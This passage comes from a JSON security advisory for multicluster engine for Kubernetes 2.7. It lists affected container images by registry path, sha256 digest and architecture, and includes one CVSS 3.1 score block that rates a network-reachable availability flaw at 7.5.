"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:aed4dab31c6e0d932781c631022214fdea5b28e6ccdc00abee3e006d13befe8a_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:31acda49be5c46912447113bf6133b4457f1f49270741859cb1493b65474d203_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:66c468c37631e94fcc32442e93a149caf3ad4831d1817314983dde8ba145fd25_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:d24798fdb05f2c2959b03889dff46e58c3b15d531a3750d1cd153ae4fcfda087_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:fce0a7344e9f0d86a8d5e5dbd70a3a8ef6a55567ade0a7345ffda3344d2617d6_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:04cc5c05db5bd9bd83f529523cc003c0ebe72d1ab55b2617bee8375b5f11616e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4ed9ab5ffc8c4fb0dc4c9faaa13e63c81dd40e2e04784bd7f48e81a0bd734a14_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:92230ad9427b8002fca17de62427089eaa409edcaa39554a96cf16c23b41b1bd_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:e8e78077943e22dfbf24b01d40f866954e39e783711a3ceab6c6f08e8e07fdce_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:5a1f7f5125b9fff4c8b415e93eaad7257af8ffb3b70823917cf0eec075484b8b_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:a47433ffe10df556b6bea4c0cc3c3f3ac508e1a9d6ab81981f7ab84afc34524c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:ae032d3383977818eab9f396217d9de8053e6a0fe2657a21fec9b4bae58940ed_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:d2e664349d706e81882258dae2d18de73c65d09649e7ac74f5616ecb81f2ffbe_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2a8862c66d7bba87f0ab708d1644eb7c01840fc8f5b3b7373044aff4e219e000_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:2d091748418b3f6d3cdcc4b4d773c98c8a22cac2717ed5274a6d8c612af51f71_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:3589f0bf450892dbfe4bac6c5255ebec5109e1d5d2e102dfb8e3e5894427a9b5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:4dfb3a2b2ea2a32c5cfc770c84fba0f158d2c759d3a6559b01efd365e4a19e52_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:2bc2bb010570cb1f65205b4c6f7f470e8b2242d1401f4d0ab8ba08bdabacefeb_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:495dece80910102a98e78394ca35ee5c4703d32f705f43f9813312872dd8b528_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:86ed174f04e82706d3c5a793fc94c5f3ff78ef7a442056e9ffbfdf04543e47e8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/work-rhel9@sha256:a80ab7578c04779f5a91eb489efe6dfa821c2f22fad92f34864402604ae6d89a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:4667db4cc9699f5e41cda6388eb7371ad9c8c73a92a7fc19115ddd48b562e56e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:c09c8b8f588cac2b8c4b15a79de635971f002419ffc2b4d967f383160897e2dd_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:d00a17c4162336d52d47452f13d2470ddd4f9d6913759472791ee4d8bfc34d46_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:fe8b267cb2ea707fda229bae30ca074079da2909e7313eff06ba9eb2fb529237_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:76d00b37dc5c5d7bf489f55f3a41a953677449491b01c789bf7b29c789c461b7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:a2fa219ec0da0910c1a858ac43d53288f2cf434c26fcb6cd8185e9d6f13a1ebd_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c4e710e3ab66dfbcb3f2db4d17f73aea44ea9d2649e5f5cec94c1b51644809cf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:c6a8bf6b7644c45a41d4c8a1c31cc08e03b6ac5ed36f562256cb1509f26a47c7_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:6ae1271bcaebb79d7dd48fa4bb89f2cf0bf450cce004899feee7d1a53d230a81_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:8ffc2f2cdfd7753c083ca083a42da60b8783d09b6817c6b22c38c91d67c0b4a5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:9295aea24d0997fd5112e4bc6701f15e5ed2ee54f298d134aef5c9d499ad7ce5_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:fb103ee7a47badea6dfd32f698cc209bb2242dd90b51986cea6f26a03ade9516_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:8173d4f41f25103f387f1b148f9e90eba72abeccd506bfe657f6fd54cbbcf395_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e146412fb2f0d808cf6a0faa5f39e54032cd4b6c594d67795bb81883ebf0b386_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:ec486aa31c687d3f9e8dffe7ae5018b9ce3cc8795a91765c237eb72b2f6984c5_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:fb47b5a6d4fe1c966eb29109c27a5e323b6b4e665a2754f234979cef4bfc6fc2_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:111a02c966b528a619c9ad5942151e64374e0c57d80be21f91c0f41469c63c19_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:1396ea60940f7dfc33d67d918dd82d62f780d0e837e12785ccec2ada30ce3f93_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:4c393e89346494a9abd31c664e977edacd6ca8bf1f1c28c2aa9a6625f0d02d9f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ca4d807da014acefb7e963000cd2431352087dd908491ff4189592f53dec93ff_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:694ac8be10bee34d7c34fdcabde7dfdf1558053cac0479eca4677971c09589e6_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:c0b2cdac26577de087dfd119ff0e2f996f211cd9021bed43d01e286fe166642d_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:d35fb00e5d71a79ec679d7bb9911c4974ca4ebe334e76461270594feda1a7378_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:dabdf0f6fec7ebd5b86034281ae740aea0e77146e33bdd04c01590745b68ea8e_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:6e44a95fd942fad8a4f43379d100d2f11808caef975afbafe244543b2f33e2b1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:bbcbedae29915aecb2d0722d16a5265b214714b2e8695f4885395982507950f8_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f02386b7e2476ab45ef771bdc6034ba4148bdbbf30cb95e2110a681adaeaa03e_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:f87238bec802fb8e8aa257f73eb32f3b3cacf1564677e594ca0d165ed2c0a021_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:2dc8a21ac845a94b55a048554052666910cd7e5fc2f9731d62c8911f18ac3fcb_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:4cb50e9064955ace00ee9bbc0592f5e073affa7a29d0d8a119b67bb8fc9d5a20_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:674b94c6913ca04eb711ccf438f24fe22d7332c8f7ca733a8d0e6b5b5b3f99ab_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:dc747542c832d5868ce34b622f3cb73a3376beab272bdb156b4a5d29439173a8_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:04ac93d513d3d10d83de367893012f4098b281c89d773d5799393b1ecb184658_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:5b51bbe361be033ce654374dbf65f15a7449072207d8350959becd9921a7da1a_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:89d53a8fca9a27f188f13631f4416eb9c8460868e095ed207f55591c76ea0acf_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:e5ab3e9b45628c867d6b8babec0e2dc9b32d1b9bdf5aae9a74ac0e45b553355f_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:1108dd8708d80e09fcc6cf4ecb2ec3d076f1fd22814b6c6ce2b4236143779527_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:4b8c28da26c5fcc04cfe2072965fdb957fd2ebc514afe8ab46c79d625dc7dd46_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:8cbfa37103a4fb66ce05ae0a001412af7556b61b4079406c82bb82a1c7bf841a_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:bf00fb14cf15607b90bfd5719b9707081b9f4696d4296944586fc839e0210d9b_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:2efa3dbf99e5be1f8eb4f169f5f2229b338fdf2d2c72b9c0b0da9392e612cc5f_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7141546552e4237c8b118044c3cc310ddfee917b547c36857a291c33e185bcc1_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:8aaa0f89e8e6ad810632240a7e032b6e673f69e1e4018ab6b36dd87de69ceeb8_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:d07f47405187ce8f4b91686b48d4ed71336ff2bd9218b88c31f52ddc22db9238_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:47c835ad25efcfa42534a1daf7235b18b318030546e81c784027c62ab665b896_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:50276a56714a1bc1aabedbadb7f702913412f6a20db8b110986436845ee2f3c7_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:705746f64a46c4990cc3ec16236c41c64352493fdeb9f7fbbc34353ff111e267_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:9358b7c24e4c4f8e72266af077352af1af3ba61e266087cf55b7dc9ea0eddcb9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:466a01f1457e47e5b418c8e1d87cc2d92e100d635e6cbbc6224039b71d413105_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:5d81a9b6f31e72d5beddec8128e693ecacd03bbbb6640a626e06a9b4b033c47e_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6d05352bd35932dc05bd12a06890b7e99594773791e0c8edd8492a835155acb3_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:70ad5cb3532bde1dd5a9337a7064dd8e1ff1799bcb017a2d2e6536a932ce22dc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:0c554f87aa16a5c7a6c6ee78886787b055fad40c557f1cbaa5996db9a09b41ce_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:618edff2bf45eea71e6f3e7f7b24e95f10314b146ff45ac72ea8cabb1cb373d4_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:92d36152258c9d926be0bdcfac34995f22eec3518111fbf2c768b660129f5440_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:cacde4ea2c1d98290f68b7ad0a3ca31582710a3b64442649baace5b8ee953f89_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:365a26e2d054aefe147ad411da6014e76c9d4f4646a8382b9be3f3eeb35fc6cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:775d0fbe7f2a3d4abdbb751331dbdc7457ff489e1d2aa32c93b7bec4dff2eeb4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d0062eaae78adb437020762d1a3e555c2b5bc0fe05da89716b2e8acf673ff661_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:db93b4a928c940e66ea4ada9f69f3b20f6bf4d64146df89d8e9e5a66acd2a03c_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:0b57da9ddb495d659da29e2a699d5fedb720056f72f77e426c40c1a7bae79a87_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:52625c24cfe3921bc6c00090b150b36544410b9b877b43e148abf634cdb8c0e9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:91c20f61a7e054ac5b53b8b8ad06f110ed3db0ace9258fd9e2b3fa03f59f11ab_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:e91c55697e0d95b8c9265d0072c5b80faed4dd9dfdfeb87443f98f473fcf42bc_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:06109d274a92145cc11d4f30ed877d2a233a4852e3537d87b117e6682b911b20_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:4f7e7a8764b018c6d51c0700a76f0dcedcf5ffe85f28f66c214e36455105e32f_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:d6afe401727d8b252009042c03319fb6a9bc2cfd2ffba5e5518c9a22e91692de_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:dc366eaa2c3f3f72003f928262c03900983aaac8352615715d72bf5223b59a94_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:2a1963aa5fb3ee452084510bac3792ae508b5c9eeb41c676e13f2551d7c88d60_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:9774a696206b422b52b5f1082750d7e62cccf3c7ee0e28ec156b560cf1acebb0_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:99d0b694cee080c924c2e2294af4a0a36f669129516f205b5e13a3eabd1ee019_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:a99ef9cd8f37bbf76d5bb6b81865547af9ec456b0204e36995ff86960abcf1f5_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:1b2c836336117c0e04dc30101898117b68edf6489ad9da955453cb6e4491bb33_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:259049072cf889d7b72fdae5b5a17bd2d4d6fd176cb1da4274b70f02c854dea9_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:90a96bb156d096a0c55fcf27b2dc0176e56c9b7388697ed17d9bbb257c39a3aa_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f3aa3d1b579275dcdf403867cc9b140f34cfcdc099d4b87819ef7f4978af2be1_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:21b52ad7c77dd21bc0a9a20a1ae6e2fc5d236b39e16dbfa82158ec80ef2846d4_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:6a83c52ba828f45e84550ba702ba86d5746057194d389b6959ab7486e8615b16_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b22d17d474876f6079c86518dbc04e692ade54067cd4fc0c5660d8a1ba0937cf_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:b34be4d5652efaee930bd26536547fd1fc04dda4060605dabc276e59f96a0a0c_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:6ab181004adafad8a5cd0155da9e107ab3989ef97007e69decb7238a9b0597da_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:7782c711aff60d9ac0d8297431eabca6945752292b16beecdb52303ad22f1553_s390x",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:9a23dfe4c781261e8db8fbb65517d69c3532fba5e897978b8a7765864b84b495_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:c29b2dc7510dcc147cf8460e4e39c0f2595edc4ff81f62c035333c6354776335_arm64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:08592505c61791b614511a2c51d9963aa3277ac9e2af98954b07e47e36ca6765_amd64",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:1145c4b8c3606c2550986f1bf352835300f58d81f6c50d63846983a666602655_ppc64le",
"multicluster engine for Kubernetes 2.7:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:53c5fd16cd44f631ca08f6eb51e346d99950c9b4c6860743262c068074ba3c9f_arm64",
